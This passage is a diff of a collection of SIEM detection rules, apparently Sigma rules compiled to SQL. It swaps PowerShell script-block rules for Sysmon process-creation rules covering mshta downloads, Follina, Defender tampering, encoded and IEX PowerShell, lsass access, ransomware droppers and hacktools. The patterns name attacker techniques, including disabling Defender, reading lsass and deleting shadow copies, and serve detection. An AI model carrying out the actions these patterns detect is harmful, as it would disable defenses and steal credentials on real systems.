"attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%set%' ESCAPE '\\' AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%mshta%' ESCAPE '\\' AND ScriptBlockText LIKE '%vbscript:createobject%' ESCAPE '\\' AND ScriptBlockText LIKE '%.run%' ESCAPE '\\' AND ScriptBlockText LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", - "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND 
NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", + "title": "Regedit as Trusted Installer", + "id": "883835a7-df45-43e4-bf1d-4268768afda4", "status": "test", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "proc_creation_win_regedit_trustedinstaller.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the 
Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" - ], + "title": "HackTool - PCHunter Execution", + "id": "fca949cc-79ca-446e-8064-01aa7e52ece5", + "status": "experimental", + "description": "Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PCHunter64.exe' ESCAPE '\\' OR Image LIKE '%\\\\PCHunter32.exe' ESCAPE '\\') OR OriginalFileName = 'PCHunter.exe' OR Description = 'Epoolsoft Windows Information View Tools' OR (Hashes LIKE '%SHA1=5F1CBC3D99558307BC1250D084FA968521482025%' ESCAPE '\\' OR 
Hashes LIKE '%MD5=987B65CD9B9F4E9A1AFD8F8B48CF64A7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2B214BDDAAB130C274DE6204AF6DBA5AEEC7433DA99AA950022FA306421A6D32%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=444D210CEA1FF8112F256A4997EED7FF%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3FB89787CB97D902780DA080545584D97FB1C2EB%' ESCAPE '\\' OR Hashes LIKE '%MD5=228DD0C2E6287547E26FFBD973A40F14%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55F041BF4E78E9BFA6D4EE68BE40E496CE3A1353E1CA4306598589E19802522C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0479F44DF47CFA2EF1CCC4416A538663%' ESCAPE '\\') OR md5 IN ('228dd0c2e6287547e26ffbd973a40f14', '987b65cd9b9f4e9a1afd8f8b48cf64a7') OR sha1 IN ('5f1cbc3d99558307bc1250d084fa968521482025', '3fb89787cb97d902780da080545584d97fb1c2eb') OR sha256 IN ('2b214bddaab130c274de6204af6dba5aeec7433da99aa950022fa306421a6d32', '55f041bf4e78e9bfa6d4ee68be40e496ce3a1353e1ca4306598589e19802522c') OR Imphash IN ('444d210cea1ff8112f256a4997eed7ff', '0479f44df47cfa2ef1ccc4416a538663')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "proc_creation_win_hktl_pchunter.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "HackTool - LocalPotato Execution", + "id": "6bd75993-9888-4f91-9404-e1e4e4e34b77", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the execution of the LocalPotato POC based on basic PE metadata information and default CLI examples", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2023.21746" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND 
ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\LocalPotato.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe -i C:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%-o Windows\\\\%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=E1742EE971D6549E8D4D81115F88F1FC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DD82066EFBA94D7556EF582F247C8BB5%' ESCAPE '\\') OR Imphash IN ('E1742EE971D6549E8D4D81115F88F1FC', 'DD82066EFBA94D7556EF582F247C8BB5')))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_localpotato.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Suspicious Call by Ordinal", + "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", + "status": "stable", + "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment", + "Windows control panel elements have been identified as source (mmc)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE '%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_rundll32_by_ordinal.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", - "tags": [ - "attack.persistence", - "attack.t1137.006" - ], + "title": "Suspicious PowerShell IEX Execution Patterns", + "id": "09576804-7a05-458e-a817-eb718ca91f54", + "status": "experimental", + "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate scripts that use IEX" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "proc_creation_win_powershell_iex_patterns.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", - "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "title": "Potential Snatch Ransomware Activity", + "id": "5325945e-f1f0-406e-97b8-65104d393fff", + "status": "stable", + "description": "Detects specific process characteristics of Snatch ransomware word document droppers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.execution", + "attack.t1204" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Scripts that shutdown the system immediately and reboot them in safe mode 
are unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%shutdown /r /f /t 00%' ESCAPE '\\' OR CommandLine LIKE '%net stop SuperBackupMan%' ESCAPE '\\'))" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "proc_creation_win_malware_snatch_ransomware.yml" }, { - "title": "Potential Persistence Via Security Descriptors - ScriptBlock", - "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", - "status": "experimental", - "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Rar Usage with Password and Compression Level", + "id": "faa48cae-6b25-4f00-a094-08947fef582f", + "status": "test", + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. 
This is pretty indicative of malicious actions.", + "author": "@ROxPinTeddy", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_ace_tampering.yml" + "filename": "proc_creation_win_rar_compression_with_password.yml" }, { - "title": "Malicious ShellIntel PowerShell Commandlets", - "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "title": "Suspicious GUP Usage", + "id": "0a4f6091-223b-41f6-8743-f322ec84930b", "status": "test", - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + 
"attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Execution of tools named GUP.exe and located in folders different than Notepad++\\updater" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\GUP.exe' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\Program Files\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\Program Files (x86)\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Local\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Notepad++\\\\updater\\\\GUP.exe' ESCAPE '\\'))))" ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml" + "filename": "proc_creation_win_gup_suspicious_execution.yml" }, { - "title": "PowerShell Get-Process LSASS in ScriptBlock", - "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", - "status": "test", - "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "title": "Whoami.EXE Execution Anomaly", + "id": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "status": "experimental", + "description": "Detects the execution of whoami.exe with suspicious parent processes.", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + "Admin activity", + 
"Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND NOT (((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe' ESCAPE '\\') OR (ParentImage = '') OR (ParentImage = '')))" ], - "filename": "posh_ps_susp_getprocess_lsass.yml" + "filename": "proc_creation_win_whoami_parent_anomaly.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Powershell", - "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", + "title": "Suspicious Process Parents", + "id": "cbec226f-63d9-4eca-9f52-dfb6652f24df", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects suspicious parent processes that should not have any children or should only have a single possible child program", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\minesweeper.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winver.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\bitsadmin.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\certutil.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\calc.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\notepad.exe' ESCAPE '\\') AND NOT (((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR Image LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mmc.exe' ESCAPE '\\' OR Image LIKE '%\\\\win32calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\')) OR (Image = '')))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" + "filename": "proc_creation_win_susp_parents.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "title": "Potential PowerShell Command Line Obfuscation", + "id": "d7bcd677-645d-4691-a8d4-7a5602b780d1", + "status": "test", + "description": "Detects the PowerShell command lines with special characters", + "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.defense_evasion", + "attack.t1027", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Amazon SSM Document Worker", + "Windows Defender ATP" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE 